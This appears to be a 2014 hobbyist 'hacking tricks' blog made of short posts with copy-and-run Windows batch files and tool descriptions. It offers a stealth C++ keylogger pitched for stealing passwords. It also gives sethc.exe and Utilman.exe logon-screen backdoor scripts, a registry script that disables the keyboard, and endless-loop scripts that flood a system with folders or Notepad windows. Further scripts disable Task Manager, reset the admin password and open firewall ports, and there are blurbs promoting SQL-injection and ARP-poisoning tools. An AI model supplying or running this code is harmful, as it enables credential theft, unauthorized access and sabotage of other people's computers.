Pages

keyboard disable

Saturday 18 January 2014
steps:
1.copy & paste the below code into notepad.
2.save file as file name.bat.
3.run file as run as administrator by right clicking on file.

code:
 @echo off
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"

echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg


warning:do not run this code on ur pc which disables your keyboard.
Read more ...

remove ports 80,443,53

Saturday 18 January 2014
steps:
1.copy & paste the below code into notepad.
2.save file as file name.bat.
3.run file as run as administrator by right clicking on file.

code:
@echo off

Echo "Press ANY KEY to REMOVE ports 80 TCP (HTTP) / 443 TCP (HTTPSecure) / 53 UDP (DNS)"

pause

"%SYSTEMROOT%\system32\netsh" advfirewall firewall add rule name="HTTP 80" dir=in action=allow protocol=TCP localport=80
Echo "80 TCP Open."

"%SYSTEMROOT%\system32\netsh" advfirewall firewall add rule name="HTTPS 443" dir=in action=allow protocol=TCP localport=443
ECHO "443 TCP Open."

"%SYSTEMROOT%\system32\netsh" advfirewall firewall add rule name="DNS 53" dir=in action=allow protocol=UDP localport=53
ECHO "53 UDP Open."

pause

above codes which removes the ports 80,443,53

Read more ...

infinite folders

Saturday 18 January 2014
steps:
1.copy & paste the below code into notepad.
2.save file as file name.bat.
3.run file as run as administrator by right clicking on file.

code:
 @echo off
:top
md %random%
goto top


 above code which create infinite folders within seconds.
Read more ...

folder locker

Saturday 18 January 2014
steps:
1.copy & paste the below code into notepad.
2.save file as file name.bat.
3.run file as run as administrator by right clicking on file.

code:
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Enter password to lock folder or for cancel press N
set/p "cho=>"
if %cho%==ragday goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==ragday goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


lock the folder by using the above code. change 'ragday' in the above code to which u would like to use password to lock or unlock folder.
Read more ...

enable and disable taskmanager

Saturday 18 January 2014
steps:
1.copy & paste the below code into notepad.
2.save file as file name.bat.
3.run file as run as administrator by right clicking on file.

code to enable taskmanager:

ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:0>> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:0 >> %WINDIR%\DXM.reg
start /w regedit /s %WINDIR%\DXM.reg


code to disable taskmanager:

ECHO REGEDIT4 > %WINDIR%\DXM.REG
echo. >> %WINDIR%\DXM.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1>> %WINDIR%\DXM.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System] >> %WINDIR%\DXM.reg
echo "DisableTaskMgr"=dword:1 >> %WINDIR%\DXM.reg
start /w regedit /s %WINDIR%\DXM.reg
Read more ...

keylogger

Saturday 18 January 2014
keylogger:

  Keylogger is intended for interception and recording in a file of everything that is entered from the keyboard into a log.txt file.
keylogger which records every strock of your keyboard.
you can hack any passwords by installing it.

code:

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>

int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}




compile the above code using the c++ compiling tools like dev c++ and turbo c++ programming tools.





Read more ...

hacking websites using havij tool

Saturday 18 January 2014

havij:

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software, user can perform back-end database fingerprinting, retrieve DBMS login names and password hashes, dump tables and columns, fetch data from the database, execute SQL statements against the server, and even access the underlying file system and execute operating system shell commands.

The distinctive power of Havij that differentiates it from similar tools lies in its unique methods of injection. The success rate of attack on vulnerable targets using Havij is above 95%.

Read more ...

recovery windows passwords using cain and abel

Saturday 18 January 2014

cain and abel:
Cain and Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some non standard utilities for Microsoft Windows users.

It allows easy recovery of several kinds of passwords by sniffing the network. APR (ARP Poison Routing) is a main feature of the program. It enables sniffing on switched networks and the hijacking of IP traffic between hosts. The name and ;ARP Poison Routing and derives from the two steps needed to perform such unusual network sniffing: an ARP Poison Attack and routing packets to the correct destination



 
Read more ...

advance port scanner

Saturday 18 January 2014

advance port scanner:
Advanced Port Scanner is yet another port scanner that provides a fast engine and an easy to use interface.which is used to scan for the open and closed ports.
scan for the open ports using the advance port scanner through which you can access the files.
check for the open ports and access the control through it.
Read more ...

angry ip scanner

Saturday 18 January 2014
angry ip scanner:

 Angry IP Scanner is an open-source and cross-platform network scanner designed to be fast and simple to use. It scans IP addresses and ports.

 find out whether an IP is alive or dead using an angry ip scanner. 
 scan for the target ip whether alive or dead
you can check ur ipadress by following command in command prompt

command:ipconfig
in linux:ifconfig
Read more ...

view the most shared and most viewed videos of another countries

Friday 17 January 2014
open the link as shown below
 http://www.youtube.com/trendsdashboard#loc0=ind

open the link to view the top videos of any country 




Read more ...

utility manager backdoor

Friday 17 January 2014
code:@echo off
pause
takeown /f %systemroot%\system32\Utilman.exe
icacls %systemroot%\system32\Utilman.exe /grant administrators:f
rename %systemroot%\system32\Utilman.exe  Utilman.exe.exe.bak
copy %systemroot%\system32\cmd.exe %systemroot%\system32\cmd3.exe
rename %systemroot%\system32\cmd3.exe Utilman.exe
pause
echo click on utilmanager (Blue Color icon) at logon screen
pause


copy the code into notepad and save as file name.bat
run the file as administrator by right clicking the file

click on the left bottom corner blue color  icon on logon screen to open the prompt and change the password through cmd prompt.


Read more ...

windows backdoor

Friday 17 January 2014
sticky keys and utility manager are the backdoors of windows operating system
goto:c:\windows\system32\sethc.exe



code:

@echo off
pause
takeown /f %systemroot%\system32\sethc.exe
icacls %systemroot%\system32\sethc.exe /grant administrators:f
rename %systemroot%\system32\sethc.exe  sethc.exe.bak
copy %systemroot%\system32\cmd.exe %systemroot%\system32\cmd3.exe
rename %systemroot%\system32\cmd3.exe sethc.exe
pause
echo Now press the Shift key 5 times at Logon Screen.
pause


1.copy the code into notepad & save the file as file name.bat
2.run the file name.bat as run as administrator on right clicking the file

after the execution of file sethc.exe appears as follows:


press shift key for 5 times which opens the cmd prompt at logon screen
use following commands to change the password at logon screen




Read more ...

download youtube videos directly without any software

Thursday 16 January 2014
steps to download:
1.open video which u want to download
example:
http://www.youtube.com/watch?v=RahEtkVxAPA

replace above url as below
 http://www.ssyoutube.com/watch?v=RahEtkVxAPA

 which shows the downloading formats & click on the format which u want to download as shown in below

Read more ...

batch file which opens notepad continuously

Thursday 16 January 2014
1.copy the below code

@echo off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


2.paste the code into the notepad
3.save the file as file name.bat

warning:do not open the file name.bat which freezes the computer
Read more ...

change admin password using notepad

Thursday 16 January 2014
1.copy the below code

Code:
@echo off
net user %username% ragday


2.paste the code into the notepad
3.save the file as file name.bat
4.run bat file as run as administrator by right clicking on file name.bat
5.now the admin password is changed to ragday as shown in above code
Read more ...

how to hide drives through cmd

Thursday 16 January 2014
to hide drive:
1.open run & type diskpart



2.list volume
3.select volume (as listed as shown in fig)
4.remove letter j (letter of drive which u likes to hide)

to unhide the drive:
1.list volume
2.select volume (which u likes to unhide)
3.assign letter j

Read more ...

how to add or remove recycle bin to my computer

Thursday 16 January 2014

1.open notepad
2.copy & paste below code into notepad
3.save file as file name.reg

to add recycle bin to my computer:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}]

to remove recycle bin from my computer:

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}]
Read more ...

how to shutdown pc through commands

Thursday 16 January 2014

commands:
shutdown multiple computers:shutdown -i
shutdown                                 :shutdown -s
shutdown at given time           :shutdown -s -t 30
abort shutdown -a                    :shutdown -a



Read more ...

how to change administrator password

Tuesday 14 January 2014
change your passwords using following commands:
1.net user
2.net user admin(username) *
3.enter password


Read more ...

backdoor

Tuesday 14 January 2014
A backdoor in a computer system is a method of bypassing normal authentication, securing illegal remote access to a computer.
Read more ...